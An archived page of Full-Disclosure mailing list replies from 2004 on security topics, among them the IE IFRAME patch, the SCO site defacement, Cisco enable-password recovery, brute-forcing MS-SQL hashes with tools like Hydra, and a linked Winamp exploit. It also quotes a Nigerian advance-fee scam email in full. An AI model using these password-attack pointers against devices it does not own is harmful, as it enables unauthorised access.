As stated in the FAQ of the patch page. It would appear the new baseline for all future patches will be SP1 unless they decided to change it. I am still using Windows XP, but extended security update support ended on September 30th, 2004. What should I do? The original version of Windows XP, commonly referred to as Windows XP Gold or Windows XP Release to Manufacturing (RTM) version, reached the end of its extended security update support life cycle on September 30th, 2004. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to future vulnerabilities. For more information about the Windows Product Life Cycle, visit the Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site. Customers who require additional support for Windows XP RTM must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of phone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System FAQ. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of BillyBob Sent: Thursday, December 02, 2004 7:07 AM To: Berend-Jan Wever; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly Does anyone know why Microsoft does not have this patch available for XP (no SP) running IE6 ? I know this system is vulnerable to the IFRAME exploit as I tested it. Bill - Original Message - From: Berend-Jan Wever [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Wednesday, December 01, 2004 8:49 PM Subject: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly The IFRAME vulnerability has been patched, see http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx *** Make sure you are patched after installing *** I installed it using Automatic Updates (on Win2ksp4), rebooted and loaded my InternetExploiter.html: IT STILL WORKED!! Even though both Automatic Updates and http://windowsupdate.microsoft.com; reported that I was patched!?! I manually downloaded the exe and ran it, rebooted and now I'm finally truely patched. It might just have been a glitch on my system, but you might wanna check anyway: InternetExploiter.html can still be downloaded from my website. Berend-Jan Wever [EMAIL PROTECTED] http://www.edup.tudelft.nl/~bjwever SkyLined in #SkyLined on EFNET ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly
I fully understand that Nick. I am a former SMS admin and had to deal with this fact in a corporate patch environment. I was helping a person that didn't understand how Microsoft uses the baseline for patching systems. I believe you looked a bit too deep into my mail or liked to assumed I was a patch n00bs. Which is not the case. And XP1 become the new baseline after Windows XP gold lost its extended support. Just like XP2 will become the new baseline once SP1 passes its extended support. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nick FitzGerald Sent: Thursday, December 02, 2004 2:18 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly Todd Towles wrote: As stated in the FAQ of the patch page. It would appear the new baseline for all future patches will be SP1 unless they decided to change it. New? There is nothing new about this. It has been standard MS policy for many years now to only support the two most recent releases of an OS, thus when Gold and SP1 are the only versions, all versions are supported, but once SP2 ships, the Gold release for that OS drops off the supported list. There is nothing new about this at all. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Is www.sco.com hacked?
Hacked by realloc() - Check out the Zone-H.org link. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Cedric Blancher Sent: Monday, November 29, 2004 7:52 AM To: Rossen Naydenov Cc: Full Disclosure Subject: Re: [Full-Disclosure] Is www.sco.com hacked? Le lundi 29 novembre 2004 à 14:58 +0200, Rossen Naydenov a écrit : I just noticed the banner on www.sco.com If you don't saw it( because it is removed) this is what they say: We own all your code pay us all your money Or is it some commercial trick? The Hacked by something I can't read the girl in background is writing definitly can't be some commercial trick ;) -- http://www.netexit.com/~sid/ PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE Hi! I'm your friendly neighbourhood signature virus. Copy me to your signature file and help me spread! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: Fwd: [Full-Disclosure] University Researchers Challenge Bush Win In Florida
Well thanks for trying to pull it off the list...lol -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of bkfsec Sent: Monday, November 29, 2004 2:49 PM To: Thomas Sutpen Cc: [EMAIL PROTECTED] Subject: Re: Fwd: [Full-Disclosure] University Researchers Challenge Bush Win In Florida I wanted to make sure that everybody else has a chance to view my remarks to Thomas' obviously unintelligable gripe with me, while we're being immature and foolish here. Why break the chain, right? Thomas, if you're going to pick a fight, please pick one you can handle with a modicum of grace. I tried to take this offlist, but you insist on dragging it back on... very sad. Maybe you feel that your non-argument with regard to me can only be bulstered by slanderous personal attacks. I can play that game, too. Have a nice day. :) Thomas Sutpen wrote: I forgot to make sure everybody else has a chance to view my remarks to Barry's obviously short-sighted arguments. -- Forwarded message -- From: Thomas Sutpen [EMAIL PROTECTED] Date: Wed, 24 Nov 2004 14:31:49 -0700 Subject: Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida To: bkfsec [EMAIL PROTECTED] On Wed, 24 Nov 2004 11:02:41 -0500, bkfsec [EMAIL PROTECTED] wrote: So anyone who is concerned about the system and has shown that they aren't on your side of the political fence should have their opinion sumarily tossed out? I never said what side of the fence I'm on. You, however, have made it more than amply clear where you are. You've already shown your hand, and like it or not, you're be labelled accordingly. You seem to be ashamed of who you are. That's a pity. :) Label me however you like. I really could care less. I've shown my hand? :) That's pretty funny. Well, since you so clearly have shown your own allegiance, wouldn't the case be the same for you? Thanks for the opening. Everyone, please disregard Thomas' opinions - he's shown himself to not be impartial. This coming from you. Sorry, that doesn't wash. Sure it washes. In fact, it washes so much that the irony of my sarcasm was entirely lost on you. Pity... maybe you should read a little bit more closely next time. I can talk to some people and maybe recommend a remedial level reading class for you. I'd have to look pretty far, though - no one I know does such a poor job as to require the remedial class you seem to need. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Is www.sco.com hacked?
.15 is dramatic? I mean Microsoft went up .17 today.. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Coombs Sent: Monday, November 29, 2004 11:04 AM To: Cedric Blancher Cc: Rossen Naydenov; Full Disclosure Subject: Re: [Full-Disclosure] Is www.sco.com hacked? Cedric Blancher wrote: The Hacked by something I can't read the girl in background is writing definitly can't be some commercial trick ;) Think not? Then how do you explain the dramatic increase in the market value of SCOX? http://quotes.nasdaq.com/asp/summaryquote.asp?symbol=SCOX%60s elected=SCOX%60 Regards, Jason Coombs [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Mailing lists and unsolicited/malicious spam
Yeah the last time I can remember that someone tried that on FD, was that some called exploit that had a IRC trojan in it...it was discovered after about 5 secs..lol -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Ron Sent: Friday, November 26, 2004 12:40 PM To: n3td3v Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Mailing lists and unsolicited/malicious spam One thing to note, however, is that people who post on this list would tend to be the ones who know better than to listen to spam or to open viruses or to help out those pool old Nigerian Diplomats. n3td3v wrote: How many people are actually subscribed (on FD) and what are the general figures for subscribers for high profile mailing lists, has any figures ever been released? And would the theft of the list of e-mails subscribed be of value to spammers? I think it would be, I hope FD admin is up to date with and keeping tracks of bugs as the rest of us. If malicious hackers/script kiddies got hold of the list, I think they would be able to attack a good percentage of inboxes with whatever they send. Weather it be porn spam or a phishing to take passwords or if it be malcious code to take advantage of POP mail clients via SMTP. I think already FD is targeted by spam/phishing hackers who wish to collect e-mail addresses for further exploration. Perhaps posting on FD could be a security risk in itself (well not just FD but mailing lists online in general) as far as POP mail clients and SMTP is concerned. (web-based e-mail has its own problems which usually don't have the risk of taking over computers like mail clients do. Usually web-based e-mail is just at risk from xss/cookie disclosure/account theft, whereas malicious code sent to mail clients can take over whole computer systems) For those of you who already have a mailing list only e-mail address and a seperate address for work related/corporate/company matters, do you see a different level of unsolicited spam, compared to the work address or other private e-mail address for friends and family? I'm thinking about setting up the same myself, just for experimental reasons! I think i'll find some differences between the two. Sorry if you don't care about anti-spam, but its something i'm interested in. Sorry to all the script kiddie hax0rs who don't like me working against you and your e-mail collecting bots! Plus, do FD admin and other high profile mailing lists have honey pots or similar methods to catch FD/mailing list born spam? I believe a big mailing list can have its own domestic/internal spam, seperate from the general internet who are not subscribed to the given mailing list or lists, and even different mailing lists having its own group of spammers targeting them, with its own nature of spam/phish/malicious code exploration. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Mailing lists and unsolicited/malicious spam
Well, you know...most normal users don't know what a exploit is, they would never know what FD is..lol But you are right..I was going easy on the n00bs. ;) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Friday, November 26, 2004 2:14 PM To: Todd Towles Cc: n3td3v; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Mailing lists and unsolicited/malicious spam On Fri, 26 Nov 2004 08:13:47 CST, Todd Towles said: Number 1, I highly doubt than a spam message would be very effective using the FD list of address only. Number 2, this list is full of security professional (white, black and grey) and I would guess that most of the core users you see on here would not just run a attachment or be fooled by the double extensions trick. Given there most likely are normal internet users on this list but I would guess that number is pretty low. Might want to re-think that number 2, based on how many people complain about viruses and malware posted to the list :) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] John the Ripper MS-SQL patch
I haven't seen a patch that makes John capable of this, but I guess it wouldn't be impossible. You can look at ForceSQL v2.0 and Hydra. Hydra is put out by THC and should be able to do what you want John to do for you. -Todd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Calum Power Sent: Thursday, November 25, 2004 2:32 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] John the Ripper MS-SQL patch G'day list, I was just wondering if anyone had heard of/written a patch for John the Ripper which makes it possible to brute-force MS-SQL password hashes. Cheers, Calum -- Calum Power - Cultural Jammer - Security Enthusiast - Hopeless Cynic [EMAIL PROTECTED] http://www.fribble.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Fwd: Hi, It's Me !!!!!
Could you please not forward your spam to the list. This is a 411 scam...if you don't know what that is..then please contact this person and talk to him. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of john morris Sent: Thursday, November 25, 2004 7:00 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Fwd: Hi, It's Me ! -- Forwarded message -- From: [EMAIL PROTECTED] [EMAIL PROTECTED] Date: Wed, 24 Nov 2004 21:08:16 -0800 Subject: Hi, It's Me ! To: FROM THE DESK OF BARRISTER. Wisdom Joshua (ESQ). Dear, I am Wisdom Joshua Esq., a Senior Advocate of Nigeria . I am the legal Representative to Mr. Harold Lebron, a national of your country, who used to work with Shell Development Company in Nigeria. Here in after shall be referred to as my client. On the 21st of April 2001, my client, his wife and their only daughter were involved in a fire outbreak in there residence. All of the family members unfortunately lost there lives. Since then I have made several enquiries to your embassy here to locate any of my clients extended relatives, this has also proved unsuccessful. After these several unsuccessful attempts, I decided to track his closest relations over the Internet, hence I contacted you. I have contacted you to assist in returning the fund valued at 16,000,000.00 USD left behind by my client before it gets confiscated or declared unserviceable by the Vault Company or Managers where this huge amount were Lodged. The said Finance Company has issued me a notice to provide the relatives or families of the deceased or have the account confiscated within the next fourteen official working days. For the fact that I have been unsuccessful in locating the relatives for over 2 years now, I seek the consent to present you as the family member to the deceased, so that the proceeds of this account can be paid to you. Secondly he has a consignment tagged 'family valuables' he shipped or lifted by as cargo to Europe early the same year he died, according to the information he passed to me, it is of a important to him. Therefore, if you are interested, endeavor to reach me immediately on my other email as thus: [EMAIL PROTECTED] to enable me inform you the modalities on how to carry out this project. I have all necessary information and legal documents needed to back you up for claim. All I require from you is your honest cooperation to enable us see this transaction through. I guarantee that this will be executed under legitimate arrangement that will protect you from any breach of the law. Please get in touch with me as soon as possible to enable us conclude in this matter. Best regards, Barrister Wisdom Joshua Esq. Metti il faccione di Shrek sul tuo cellulare! http://www.specialeshrek.canale5.com -- (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] University Researchers Challenge Bush Win In Florida
I asked very nicely...and didn't say it wasn't in some weird way connected and normally I do delete the messages I don't want to see. But I also contacted people directly if I feel that the list will have nothing to add to the talk. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steve Wray Sent: Wednesday, November 24, 2004 10:09 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida Todd Towles wrote: Did the charter say something about political messages?..please take it off the list guys if possible... Actually, I thought that particular post was in the spirit of the list... It seemed to me to address technologies and methodologies. I didn't think that it dwelled on party political issues. Though, to be honest, I think Paul should have sent that last one just to the addressee not to the list. But he does come up with some gems so he won't go on my plonkers list :) If you want to be truly pedantic as to what counts as political, well... there wouldn't be much to choose from. Everything is politics if you squint hard enough. I find the best method of dealing with full disclosure is that every time you see someone post something you consider off topic or a troll or whatever suits your taste, simply filter their address out. Filtering by subject doesn't help much as trolls will post to *anything* but trolls *will* post. So as long as I filter out anyone that seems like a troll (or otherwise an idiot) full disclosure comes up with some gems. And the best part is that if someone on your plonker list says something genuinely interesting, they will doubtless be quoted by someone else so you may still get to read it. And the list has an archive. Without filters I'd have left FD years ago... -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Wednesday, November 24, 2004 11:22 AM To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida --On Wednesday, November 24, 2004 05:39:31 AM + Jason Coombs [EMAIL PROTECTED] wrote: [massive snip] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Network Security in India
Correct me if I am wrong, but a LAN that is plagued by worms, DOS attacks, people sniffing passwords and privacy issues..is called the Internet. It is a untrusted network and you should protect your network from it...defense in layers..firewalls..proxies..you know. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gautam R. Singh Sent: Wednesday, November 24, 2004 8:45 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Network Security in India Hi, I am sure there would have been many lapses in security. And one such trend I see here is a number of small cable internet providers that have sprung up in my area (Delhi, NCR). All of them use RF links etc from ISP like Bharti, Primus etc and provide internet thru ethernet on a Cat5 cable. And now imagine the possibilities. :) Users of such systems are on LAN, plagued by worms, DoS, privacy issues, sniffing passwords, monitoring what sites other peepz are visiting etc etc. //is there any security list specific for India where we can just discuss learn new things Regards, Gautam --__--__-- Message: 14 Date: Wed, 24 Nov 2004 03:03:00 +0530 From: john morris [EMAIL PROTECTED] Reply-To: john morris [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Network Security in India I had a brief stint Primus Telecom in delhi ( www.primus-direct.com). It has a flat network with absolutely no security. The routers as as vulnerable to any known exploit and the same applies to a few web servers they host. The basics such as patch management is never taken care of. This mail doesnot intend to harm any one but i want to know is this the way major ISP around the globe function. The company functions on illegal frequencies (Primus's major customers connect through RF links). I have the proofs to show that they do function on frequencies not allocated to them and during routine check ups by the DoT ( Department of Telecommunications Govt. of India) They have to change the frequency for a while and do favors to the Govt. Employees to keep the business going. Well this is not my concern but somehow this seems unhealthy. Is this a practise worldwide. During my interview with a company major i insisted on my security conern but the company was least bothered. Would someone tell me is this the way the whole industry functions. Inspite of reminders to the company that any lamer has the potential to run them out of business by bringing their whole network down within a few min( which includes the ETBwmgr , the netcache box or even the main router(7500 series with a backup)) has been given a deaf ear. Is this the way a ISP with important clients in the pvt and the govt key sectors functions. I personally doubt the future. Is Primus listening. Its time to wake up. -- (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris -- Gautam R. Singh [mcp, ccna, cspfa, unemployed] t: +91 9848 525 074 | pgp: http://gautam.techwhack.com/key/ | ymsgr: er-333 | msn: [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] previledge password in cisco routers
Well logically, a person that owns a Cisco device could get help from Cisco or at the very least their website. But he instead posted on a grey security list, interesting...you know what they say, smells like a kiddie, looks like a kiddie..you know the rest. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Leeuwen, Allan van Sent: Wednesday, November 24, 2004 8:27 AM To: [EMAIL PROTECTED] Cc: john morris Subject: RE: [Full-Disclosure] previledge password in cisco routers And may I add that your other posts look more or less the same I'm putting my money on you being a skiddie :) l8r -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Rutledge Sent: Wednesday, November 24, 2004 2:42 PM To: [EMAIL PROTECTED] Cc: john morris Subject: Re: [Full-Disclosure] previledge password in cisco routers The amount of help you receive on this mailing list is going to depend greatly on one question: Do you own the box? (or the router as it is in your case). As it stands, and I mean this in the best way possible, you look like a script kiddie looking to get some leetness by doing something easy. The suggestions you get on FD are not going to be as helpful to you if you are trying to hack someone else's hardware. That said, I happily look forward to the flames you are about to get for asking how to hack someone's router. This will be an entertaining Wednesday after all. :) -Michael On Wed, 24 Nov 2004 04:28:18 -0800 (PST), Paulo Pereira [EMAIL PROTECTED] wrote: John, if you have an old config you may decode it with some available tools in the web. A google search for cisco password recovery may help you. If you use TACACS change it there... or force the TACACS to disappear to use the local one... it really depends on the configs you have in the box. Regards, Paulo Pereira quote who=john morris Ooops.. i reframe my question. Is there a way to get the enable password remotely . Brute force is not my option (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html === De informatie opgenomen in dit bericht kan vertrouwelijk zijn en is alleen bestemd voor de geadresseerde. Indien u dit bericht onterecht ontvangt, wordt u verzocht de inhoud niet te gebruiken en de afzender direct te informeren door het bericht te retourneren. Hoewel Orange maatregelen heeft genomen om virussen in deze email of attachments te voorkomen, dient u ook zelf na te gaan of virussen aanwezig zijn aangezien Orange niet aansprakelijk is voor computervirussen die veroorzaakt zijn door deze email. The information contained in this message may be confidential and is intended to be only for the addressee. Should you receive this message unintentionally, please do not use the contents herein and notify the sender immediately by return e-mail. Although Orange has taken steps to ensure that this email and attachments are free from any virus, you do need to verify the possibility of their existence as Orange can take no responsibility for any computer virus which might be transferred by way of this email. === ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] previledge password in cisco routers
Do you seriously think there is a easy way to get the enable password remotely? If you have the config, you can get it from there..if you have the box you can do a password recovery by booting in rommon...otherwise the box isn't yours..and you won't find a clear exact answer because there isn't one. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of john morris Sent: Wednesday, November 24, 2004 3:15 AM To: Scott T. Cameron Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] previledge password in cisco routers Ooops.. i reframe my question. Is there a way to get the enable password remotely . Brute force is not my option (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Winamp vulnerability : technical study and Exploit released
Nope, that is what this is for... Only a few employees remain to prop up the once-ubiquitous digital audio player with minor updates, but no further improvements to Winamp are expected. Therefore no big changes but they can fix small things. They tried with 5.0.6 but they will have to try again. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Rich Eicher Sent: Wednesday, November 24, 2004 11:05 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Winamp vulnerability : technical study and Exploit released This may have something to do with why there is no patch out from Nullsoft. http://www.betanews.com/article/Death_Knell_Sounds_for_Nullsof t_Winamp/1100111204 On Wed, 24 Nov 2004 07:08:52 -0800 (PST), ElviS .de [EMAIL PROTECTED] wrote: exploit and technical study of the Winamp flaw posted by k-otik http://www.k-otik.com/exploits/20041124.winampm3u.c.php ..the cdda library only reserves 20 bytes for names when files are .cda, so the stack will be overwritten and exception occurs when a name looks like .cda but still NO patch from Winamp !!! Do you Yahoo!? Yahoo! Mail - You care about security. So do we. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] previledge password in cisco routers
Sorry but cisco can only be blamed for so much. If you allow telnet to your router from the internet...then how is that Cisco's fault? Or even if you allow SSH from the internet...network protection is the key. Software will have holes and problems with be found. Only thru good network design and layered security will you be protected. Server are open to attack also if you allow FTP, SSH and TS from the internet...what do you think will happen? SNMP strings are like gold..and very few people understand they need to change them and guard them as such...but again that isn't cisco's fault. Should you use the web interface to connect your routers? Well no..there are problem with it...learn the command line and therefore the problem doesn't exist. -Original Message- From: Gary E. Miller [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 24, 2004 1:20 PM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] previledge password in cisco routers -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Todd! On Wed, 24 Nov 2004, Todd Towles wrote: Do you seriously think there is a easy way to get the enable password remotely? Cisco has previously had bugs that allowed easy enable password recovery remotely using SNMP and the web management interface. If it is an older unpatched router, showing one of these services to you, then a search of standard exploits will turn up what you need. There was a particularly nasty telnet hack a while back. Even if you had an ACL on the port you were easily hacked. If past performance is any indicator or future performance then there will again be a Cisco bug, or sloppy admin, that allows this. RGDS GARY - -- - Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 Fax: +1(541)382-8676 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFBpN748KZibdeR3qURAh6DAJ4zZnYcMO0uhg6lfs83ScS3IpsVxgCgiVBK 9rIjcwwiaIDhHAK15G8x0wk= =wREb -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] University Researchers Challenge Bush Win In Florida
Did the charter say something about political messages?..please take it off the list guys if possible... -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Wednesday, November 24, 2004 11:22 AM To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida --On Wednesday, November 24, 2004 05:39:31 AM + Jason Coombs [EMAIL PROTECTED] wrote: In the case in point, even with the variables you mention, the entire technical problem can be reduced to observing how the election officials in various places have historically constructed ballots and influence just those that can be influenced in just those states where it will matter. The Republican party (my party) apparently has advantages over others when it comes to influencing the technical details of the design of voting machines. Diebold, for example. The horse has already been packed up and shipped from the rendering plant, but I'll give this *one* more try. (One side note - the management of Diebold are mostly Democrats, not Republicans, not that *that* makes one iota of difference in the competence (or lack thereof) in designing electronic balloting equipment. Pointing to someone's party affiliation as proof of something is merely a distraction from the real issues.) You are talking about an extremely complex and unlikely set of possibilities, *all* of which have to fall into place perfectly for this to happen. It might be fun as speculation, but the implementation would be nigh until impossible and would take some real genius to pull off. It makes just about as much sense for every regional election office to do their ballot construction differently as it does for everyone to create their own home grown crypto. And yet it's done all over America. Imagine that. Your point about differences in ballot construction is also a red herring to begin with. If you think that there is the same degree of variability with ballots in electronic voting machines as there is with legacy ballots, then perhaps you are the one who does not know how the process really works with the machines in question. Why would you assume the ballots all have to be the same just because the same machines are being used to count them? Given three candidates for President (and there are usually more than that) there are at least six different ways the ballot could be arranged *even* if the basic design was the same. Furthermore, the methodology used by an electronic voting machine is independent of the ballot design, for all intents and purposes. For example, an optical reader merely senses the dark spots where a vote has been cast. *Which* candidate that represents is determined by the configuration, which is determined by the construction of the ballot. Having to fit within certain machine-driven parameters does not force the ballot design into one pattern. The votes could be on the left, in the center, on the right, staggered from left to right, staggered from right to left. The possibilities are great. Yet you want to control *all* of that to take advantage of statistical anomalies in the equipment? Do we have a mathematician on this list who can calculate the probabilities of this? I would contend that it is infinitely more likely that the machines would be either deliberately tampered with or incompetently misconfigured, ending up in statistical anomalies then I would ever consider your scenario possible. You really need to stop making things seem so complicated that the difficulty of influencing their behavior or outcome couldn't possibly be surmounted. Jason, I'm not making anything complicated. I'm observing the complication that already exists - the complication that you apparently refuse to acknowledge. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Very True, not to talk about all the apps that won't run correctly in Windows because of non-admin rights. Should we all have to give premissions to special reg keys just to have a app run as a non-admin? I mean come on...you give us a so called security feature (Run As) and then it is only useable half the time for the IT world and almost totally useless for the everyday basic user. But of course most of the apps that don't work with Run As are harder apps but I am sure everyone has seen some. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of devis Sent: Sunday, November 21, 2004 12:11 AM Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Todd Towles wrote: Windows doesn't tell you about the Admin account and makes the default user a Admin. That isn't best method as you know. RunAs is great..but that is only good once you create a normal user - and then delete your new default user. Or you log in in Administrator and take away the full control of the default user. Easy for the average window user? Nope. If it was Microsoft would make the default user (note USER) and then let you configure the Admin account on start. Thank you. Sometimes i feel the message doesn't get across. Run as is a false sense of security. Majority of MS apps ( that gets owned ) run with Admin or Local System priviledges. Does Run as works on IE ? on Office ? on IIS ? My point was that instead of 'hiding' computer knowledge from the 'user' , and introducing false 'hyped' security such as 'RunAs', assuming his stupidity, i think people will be likely to understand that to install a program they would have to use a different account than from browsing pages. Especially when the company behind has lots of $$$ to make it friendly and understood. 15 years ago people thought only a few people will ever use email.. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
If you are on the box, having changed the name of the Admin is useless. Naming doesn't safe you from a lot...a simple registry pull in Windows will get you all the hashed passwords. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jeremy Davis Sent: Friday, November 19, 2004 8:40 PM To: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Are you able to change root's name in nix? Why not if the answer is no? (Things would break right? UID 0?) Knowing the account name is two-thirds of the battle. In windows it's fairly easy to change the admin name. Not a professional here just curious... J On Fri, 19 Nov 2004 17:13:36 -0500, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Fri, 19 Nov 2004 13:12:31 EST, Crotty, Edward said: I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1. There is such a thing as runas for Windows. Yes, but is *the main design* of the system run as a mortal, and use the 'runas' for those things that need more? Or is the *main design* We'll just elect the first user as Administrator, and include 'runas' in case somebody wants to Do It The Right Way? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows user privileges
